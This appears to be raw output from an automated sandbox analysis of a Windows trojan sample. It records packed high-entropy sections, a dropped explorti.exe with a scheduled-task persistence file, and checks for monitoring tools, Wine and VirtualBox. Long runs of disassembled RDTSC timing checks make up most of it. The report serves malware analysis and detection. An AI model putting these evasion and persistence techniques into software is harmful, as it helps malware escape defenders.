Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static file information: File size 1920000 > 1048576
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: Raw size of eqezoorp is bigger than: 0x100000 < 0x1a3400

Data Obfuscation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Unpacked PE file: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe.900000.0.unpack :EW;.rsrc:W;.idata :W; :EW;eqezoorp:EW;vzestrad:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;eqezoorp:EW;vzestrad:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 2.2.explorti.exe.e20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;eqezoorp:EW;vzestrad:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;eqezoorp:EW;vzestrad:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 8.2.explorti.exe.e20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;eqezoorp:EW;vzestrad:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;eqezoorp:EW;vzestrad:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: explorti.exe.0.dr Static PE information: real checksum: 0x1d73a5 should be: 0x1dceda
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: real checksum: 0x1d73a5 should be: 0x1dceda
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: section name:
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: section name: .idata
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: section name:
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: section name: eqezoorp
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: section name: vzestrad
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: section name: .taggant
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: .idata
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: eqezoorp
Source: explorti.exe.0.dr Static PE information: section name: vzestrad
Source: explorti.exe.0.dr Static PE information: section name: .taggant
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 2_2_00E3D84C push ecx; ret 2_2_00E3D85F
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: section name: entropy: 7.984651828533471
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: section name: eqezoorp entropy: 7.952940556000888
Source: explorti.exe.0.dr Static PE information: section name: entropy: 7.984651828533471
Source: explorti.exe.0.dr Static PE information: section name: eqezoorp entropy: 7.952940556000888
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Boot Survival

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe File created: C:\Windows\Tasks\explorti.job
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3E319 second address: B3E32D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c jl 00007FABC9471C2Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3C44C second address: B3C451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3E4B2 second address: B3E4B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3C451 second address: B3C523 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD765h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FABC90CD758h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov edi, 30B7A5C0h 0x00000029 push dword ptr fs:[00000000h] 0x00000030 jmp 00007FABC90CD766h 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c stc 0x0000003d mov eax, dword ptr [ebp+122D0651h] 0x00000043 push 00000000h 0x00000045 push ebp 0x00000046 call 00007FABC90CD758h 0x0000004b pop ebp 0x0000004c mov dword ptr [esp+04h], ebp 0x00000050 add dword ptr [esp+04h], 00000019h 0x00000058 inc ebp 0x00000059 push ebp 0x0000005a ret 0x0000005b pop ebp 0x0000005c ret 0x0000005d call 00007FABC90CD761h 0x00000062 sbb edi, 2F5DA718h 0x00000068 pop ebx 0x00000069 xor ebx, 41FE2919h 0x0000006f push FFFFFFFFh 0x00000071 call 00007FABC90CD769h 0x00000076 clc 0x00000077 pop ebx 0x00000078 nop 0x00000079 push eax 0x0000007a push edx 0x0000007b jg 00007FABC90CD758h 0x00000081 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3F3A5 second address: B3F3AB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3E4B6 second address: B3E4BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3C523 second address: B3C557 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FABC9471C30h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FABC9471C3Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3E4BC second address: B3E563 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FABC90CD75Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FABC90CD768h 0x00000010 nop 0x00000011 or di, BB77h 0x00000016 mov ebx, dword ptr [ebp+122D3432h] 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov dword ptr [ebp+122D3670h], eax 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 mov dword ptr [ebp+122D1ECCh], ecx 0x00000036 mov eax, dword ptr [ebp+122D10CDh] 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007FABC90CD758h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 00000019h 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 jng 00007FABC90CD756h 0x0000005c push FFFFFFFFh 0x0000005e push 00000000h 0x00000060 push ebx 0x00000061 call 00007FABC90CD758h 0x00000066 pop ebx 0x00000067 mov dword ptr [esp+04h], ebx 0x0000006b add dword ptr [esp+04h], 00000019h 0x00000073 inc ebx 0x00000074 push ebx 0x00000075 ret 0x00000076 pop ebx 0x00000077 ret 0x00000078 mov bl, F6h 0x0000007a push eax 0x0000007b push esi 0x0000007c push eax 0x0000007d push edx 0x0000007e pushad 0x0000007f popad 0x00000080 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B4142B second address: B41450 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Dh 0x00000007 jmp 00007FABC9471C30h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B41450 second address: B41454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B41454 second address: B41458 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B41C81 second address: B41C85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B42CF9 second address: B42CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B43E9A second address: B43EB0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FABC90CD758h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jbe 00007FABC90CD75Eh 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B42CFD second address: B42D07 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FABC9471C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B47B04 second address: B47B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FABC90CD764h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AD7898 second address: AD789C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B4CE23 second address: B4CE3C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FABC90CD75Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B4CFBE second address: B4CFC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FABC9471C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B52508 second address: B5250D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B56C5C second address: B56C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B56C63 second address: B56C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B56DF7 second address: B56DFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B56DFD second address: B56E12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FABC90CD756h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B56F72 second address: B56F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FABC9471C26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B56F7E second address: B56F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B56F83 second address: B56F94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FABC9471C26h 0x00000009 jnp 00007FABC9471C26h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B56F94 second address: B56F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AE3775 second address: AE377D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AE377D second address: AE3784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B5BAC4 second address: B5BAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B5BAC8 second address: B5BAEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD764h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FABC90CD75Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B5BD85 second address: B5BD90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FABC9471C26h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B5BD90 second address: B5BD96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B5BD96 second address: B5BD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B5B50B second address: B5B527 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007FABC90CD756h 0x00000009 jmp 00007FABC90CD75Ah 0x0000000e pop ebx 0x0000000f jl 00007FABC90CD75Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B5C4AA second address: B5C4BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jbe 00007FABC9471C2Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B5C4BF second address: B5C4C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B5C4C5 second address: B5C4CE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B5C4CE second address: B5C4D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B5C7D4 second address: B5C7E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABC9471C2Dh 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B30C16 second address: B30C20 instructions: 0x00000000 rdtsc 0x00000002 je 00007FABC90CD75Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B30D70 second address: B30D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B30D74 second address: B30D7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B30D7A second address: B30D96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B30D96 second address: B30D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B30D9F second address: B30DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B30DA3 second address: B30DD8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FABC90CD75Ah 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jmp 00007FABC90CD75Eh 0x00000017 pop eax 0x00000018 mov edx, edi 0x0000001a call 00007FABC90CD759h 0x0000001f pushad 0x00000020 push ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B30DD8 second address: B30DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FABC9471C26h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B30F4A second address: B30F7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD765h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FABC90CD763h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B30F7C second address: B30F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B30F80 second address: B30F84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B310BC second address: B310CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FABC9471C2Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B310CD second address: B310D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B310D1 second address: B310DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FABC9471C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B31316 second address: B3131C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3131C second address: B31320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B31320 second address: B31324 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B31324 second address: B3134B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jnl 00007FABC9471C2Ch 0x0000000f push 00000004h 0x00000011 mov edx, 04B5A3A5h 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jne 00007FABC9471C26h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3134B second address: B31351 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B31351 second address: B3135B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FABC9471C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3135B second address: B3135F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B317D1 second address: B317D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
